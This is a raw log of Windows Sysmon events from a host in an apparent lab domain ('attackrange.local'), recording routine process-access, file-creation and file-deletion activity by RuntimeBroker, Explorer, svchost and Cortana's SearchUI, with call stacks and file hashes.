12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.913{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.2.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.1.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.898{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{739803e1-6d06-4151-9294-82b30eaaf3d4}\0.0.filtertrie.intermediate.txt2021-03-31 12:02:31.898 11241100x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txt2016-04-15 08:09:24.000 23542300x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appssynonyms.txtMD5=0159FA2FCDF8F84DB30198B1B3F95415,SHA256=4123D6B7736C9764973415C8F03F58E76FB2FB0A08E8F55CE9165C0C631C955E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.804{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 
10341000x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.804{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingssynonyms.txt2021-03-31 12:02:31.773 11241100x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appssynonyms.txt2021-03-31 12:02:31.773 
11241100x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingsconversions.txt2021-03-31 12:02:31.773 11241100x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appsconversions.txt2021-03-31 12:02:31.773 11241100x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingsglobals.txt2021-03-31 12:02:31.773 11241100x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appsglobals.txt2021-03-31 12:02:31.773 10341000x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.757{266CAFBE-646C-6064-1200-00000000AE01}11961468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.726{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7CFFC8A5368B8DE3C825A819CA1578,SHA256=A13C642FC4D84A281821A6531285D2AA86391627CAF91D064AE6A1C056B56A9C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.711{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132616657513042175.txt2021-03-31 12:02:31.711 
10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.711{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.711{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 